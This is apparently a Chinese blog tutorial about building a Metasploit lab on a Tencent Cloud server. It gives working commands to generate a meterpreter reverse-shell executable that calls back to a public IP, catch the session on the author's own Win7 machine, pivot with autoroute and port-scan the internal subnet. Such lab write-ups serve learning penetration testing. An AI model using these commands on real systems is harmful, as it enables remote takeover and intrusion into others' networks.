在腾讯云上搭建msf测试环境

前言

1个月前学习msf时,考虑到只在内网测试没什么意思,于是我在腾讯云上租了个云服务器。腾讯云网络架构是由公网网卡和内网网卡组成,不过在云主机中使用ipconfig/ifconfig查看网络接口信息时,只能看到内网IP的信息。 

首次搭建时,我选择了server2008镜像,并在上面安装了集成msf的pentestbox。不幸的是,一切配置完成后,我在本地win7上运行msfvenom生成的exe文件,云服务器上的msf并没有获得win7的shell。一开始我猜测是pentestbox的问题,于是把云服务器重装成了Ubuntu系统。但是很遗憾,这次msf同样没有接收到本地win7反弹的shell。我开始怀疑是云服务器的外网--内网映射的问题,通过搜索得到了如下几种答案:

     ①公网ip很贵的,腾讯云使用的是公共公网ip。

     ②购买带宽才会分配给你的云服务器公网IP地址。

     ③云服务器虽然是内网IP,但是全部NAT到了公网,不需要手动做端口映射。

      ......

折腾了一阵子,仍然没有解决问题,最后我放弃了挣扎。。1个月后的今天,我突然想到这个事情,便登录云服务器看了看。这次我切换成root用户运行msf,神奇的是,竟然测试成功了!!我也懒得纠结是什么原因了,以下是正文......


1.登录到Ubuntu系统后,首先切换成root用户

2.安装metasploit

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod 755 msfinstall

./msfinstall

3.安装postgresql数据库

安装数据库时会自动创建系统用户postgres、数据库用户postgres、数据库postgres

apt-get install postgresql   安装postgresql数据库

su postgres   切换到postgres用户

psql   登录postgresql数据库,首次登录没有密码

\password postgres   修改数据库用户postgres的密码

4.metasploit的使用

msfvenom -p windows/meterpreter/reverse_tcp LHOST=118.89.216.104 LPORT=888 -f exe -o end.exe  这次LHOST是公网IP

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 10.141.103.129  这里LHOST是内网IP

set LPORT 888

exploit

5.在本地win7上运行end.exe,云服务器上的msf会获得shell

在腾讯云上搭建msf测试环境_第1张图片

添加到win7子网的路由表

run get_local_subnets  查看win7的本地子网

run autoroute -s 192.168.80.0/24  添加路由表

run autoroute -p  查看路由表

在腾讯云上搭建msf测试环境_第2张图片

扫描win7所在的本地子网

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.80.0/24

set ports 139,445

exploit

在腾讯云上搭建msf测试环境_第3张图片

你可能感兴趣的:(在腾讯云上搭建msf测试环境)